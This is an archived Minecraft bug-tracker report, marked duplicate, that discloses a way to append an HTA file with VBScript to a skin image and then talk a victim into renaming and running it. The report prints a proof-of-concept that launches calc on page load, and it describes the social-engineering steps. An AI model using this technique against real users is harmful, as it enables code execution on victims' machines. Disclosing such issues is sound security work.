Mojira Archive
WEB-873

RCE using Social Engineering with modified skins

You can have an HTML-Application (.hta) like:

<html>
<head>
<script language="VBScript">
    Sub DoTheThing
        Set objshell = CreateObject("Wscript.Shell")
        objshell.Run "calc"
        self.close()
    End Sub
</script>
</head>
<body onload="DoTheThing">
</body>
</html>

and append it to your skin image, and then you can go on Skype, etc. to tell any victim who was on the same server as you to rename your skin file (in .minecraft/assets) to something.hta and run it, which can then be used to do all sorts of bad things.

I have been made aware of this exploit in this (German) video: https://www.youtube.com/watch?v=BGC5oUcK5Z0
It showcases how to set up the file and skin and how to (ab)use this.

Duplicate

Tim "timmyRS" Speckhals

2017-09-10, 07:23 AM

2017-09-10, 10:08 PM

2017-09-10, 11:59 AM

0

1

skin